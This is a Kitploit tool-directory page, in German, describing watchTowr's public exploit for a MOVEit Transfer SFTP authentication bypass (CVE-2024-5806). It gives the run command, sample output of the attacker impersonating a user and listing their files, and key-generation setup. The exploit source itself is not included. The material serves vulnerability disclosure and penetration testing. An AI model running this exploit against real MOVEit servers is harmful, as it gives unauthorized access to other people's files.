Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
watchTowr-vs-progress-moveit_CVE-2024-5806 — Exploit für die CVE-2024-5806 | Kitploit
Tools/GitHubGitHub/watchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubwatchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806

watchTowr-vs-progress-moveit_CVE-2024-5806

Exploit für die CVE-2024-5806

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
4542vor 2 JahrenVon Kitploit geprüft

CVE-2024-5806

Exploit für Progress MOVEit Transfer CVE-2024-5806. Siehe unseren Blogbeitrag unter [TBD].

PoC in Aktion

Siehe --help für, nun ja, Hilfe. Eine typische Ausführung sollte so aussehen:

root@kitploit:~
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-5806.py
        (*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
              in order to enable proactive protection of client attack surfaces.
              We will update with proper credit when available.
        CVEs: [CVE-2024-5806]

(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:

-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0  304 Jun 17 17:29 passwords.txt

Einrichtung

Um den Exploit auszuführen, benötigen Sie ein Schlüsselpaar im PEM- und PPK-Format. Unter Windows können Sie puttygen verwenden, um diese Dateien zu generieren. Unter Linux können Sie die Pakete openssh und putty-tools verwenden. Drücken Sie einfach die Eingabetaste, wenn Sie nach einem Schlüssel gefragt werden.

root@kitploit:~
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa

Betroffene Versionen

Diese Sicherheitslücke wurde in Progress MOVEit Version 2024.0.2 behoben.

Exploit-Autoren

Dieser Exploit wurde geschrieben von Aliz (@AlizTheHax0r) und Sina Kheirkhah (@SinSinology) von watchTowr (@watchtowrcyber)

Folgen Sie watchTowr Labs

Für die neuesten Sicherheitsforschungen folgen Sie dem watchTowr Labs Team

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • [Blog-Link TBD]
Tool herunterladen